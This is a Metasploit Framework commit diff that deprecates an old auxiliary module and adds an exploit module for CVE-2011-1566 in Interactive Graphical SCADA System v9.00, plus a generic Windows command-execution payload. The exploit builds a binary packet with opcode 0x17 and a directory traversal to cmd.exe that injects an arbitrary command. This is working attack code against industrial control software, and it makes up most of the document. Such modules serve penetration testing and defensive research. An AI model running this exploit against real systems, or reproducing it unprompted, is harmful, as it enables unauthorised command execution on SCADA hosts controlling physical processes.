rapid7 · wchen-r7 · Oct 21, 2013 · Oct 17, 2013
diff --git a/modules/auxiliary/admin/scada/igss_exec_17.rb b/modules/auxiliary/admin/scada/igss_exec_17.rb
@@ -9,6 +9,10 @@
 
 class Metasploit3 < Msf::Auxiliary
 
+  require 'msf/core/module/deprecated'
+  include Msf::Module::Deprecated
+  deprecated Date.new(2013, 12, 17), 'exploit/windows/scada/igss_exec_17'
+
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})

diff --git a/modules/exploits/windows/scada/igss_exec_17.rb b/modules/exploits/windows/scada/igss_exec_17.rb
@@ -0,0 +1,80 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Interactive Graphical SCADA System Remote Command Injection',
+      'Description'    => %q{
+          This module abuses a directory traversal flaw in Interactive
+        Graphical SCADA System v9.00. In conjunction with the traversal
+        flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
+        may be able to execute arbitrary system commands.
+      },
+      'Author'         =>
+        [
+          'Luigi Auriemma',
+          'MC'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2011-1566'],
+          [ 'OSVDB', '72349'],
+          [ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
+        ],
+      'Platform'       => 'win',
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Space'       => 153,
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Windows', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 21 2011'))
+
+    register_options(
+      [
+        Opt::RPORT(12397)
+      ], self.class)
+  end
+
+  def exploit
+
+    print_status("Sending exploit packet...")
+
+    connect
+
+    packet =  [0x00000100].pack('V') + [0x00000000].pack('V')
+    packet << [0x00000100].pack('V') + [0x00000017].pack('V')
+    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
+    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
+    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
+    packet << [0x00000000].pack('V')
+    packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
+    packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"
+    packet << "\x00" * (143) #
+
+    sock.put(packet)
+    sock.get_once(-1,0.5)
+    disconnect
+
+  end
+
+end
diff --git a/modules/payloads/singles/cmd/windows/generic.rb b/modules/payloads/singles/cmd/windows/generic.rb
@@ -0,0 +1,57 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/find_shell'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Windows Command, Generic Command Execution',
+      'Description'   => 'Executes the supplied command',
+      'Author'        => 'hdm',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::None,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'generic',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+
+    register_options(
+      [
+        OptString.new('CMD', [ true, "The command string to execute" ]),
+      ], self.class)
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    return datastore['CMD'] || ''
+  end
+
+end